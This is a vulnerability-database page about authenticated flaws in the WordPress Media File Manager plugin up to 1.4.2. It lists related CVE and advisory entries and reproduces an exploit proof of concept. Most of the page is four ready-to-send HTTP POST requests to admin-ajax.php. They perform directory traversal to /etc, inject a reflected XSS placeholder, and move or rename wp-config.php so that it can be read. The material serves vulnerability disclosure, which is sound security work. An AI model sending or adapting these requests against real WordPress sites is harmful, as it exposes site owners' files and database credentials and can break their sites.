Media File Manager <= 1.4.2 Authenticated Multiple Vulnerabilities including directory traversal, reflected XSS, file movement, and file renaming
Reporter | Title | Published | Views | Family All 18 |
---|---|---|---|---|
![]() | WordPress Media File Manager Plugin < 1.4.4 Multiple Vulnerabilities | 6 Mar 201900:00 | – | openvas |
![]() | Media File Manager <= 1.4.2 - Authenticated Multiple Vulnerabilities | 5 Nov 201800:00 | – | wpvulndb |
![]() | CVE-2018-19042 | 31 Jan 201919:00 | – | cvelist |
![]() | CVE-2018-19041 | 31 Jan 201919:00 | – | cvelist |
![]() | CVE-2018-19040 | 31 Jan 201919:00 | – | cvelist |
![]() | CVE-2018-19043 | 31 Jan 201919:00 | – | cvelist |
![]() | Directory traversal | 31 Jan 201919:29 | – | prion |
![]() | Design/Logic Flaw | 31 Jan 201919:29 | – | prion |
![]() | Directory traversal | 31 Jan 201919:29 | – | prion |
![]() | Directory traversal | 31 Jan 201919:29 | – | prion |
Source | Link |
---|---|
packetstormsecurity | www.packetstormsecurity.com/files/150281/ |
vulners | www.vulners.com/exploitdb/EDB-ID:45809 |
Diretory Trasversal:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: REDACTED
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 53
Connection: close
Cookie: REDACTED
action=mrelocator_getdir&dir=../../../../../../../etc
Reflected XSS:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Connection: close
Cookie: REDACTED
action=mrelocator_getdir&dir=[XSS]
Move any file to any dir:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 75
Connection: close
Cookie: REDACTED
action=mrelocator_move&dir_from=../../&dir_to=../../../&items=wp-config.php
Rename any file:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 97
Connection: close
Cookie: REDACTED
action=mrelocator_rename&dir=../../&from=wp-config.php&to=wp-config.txt
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo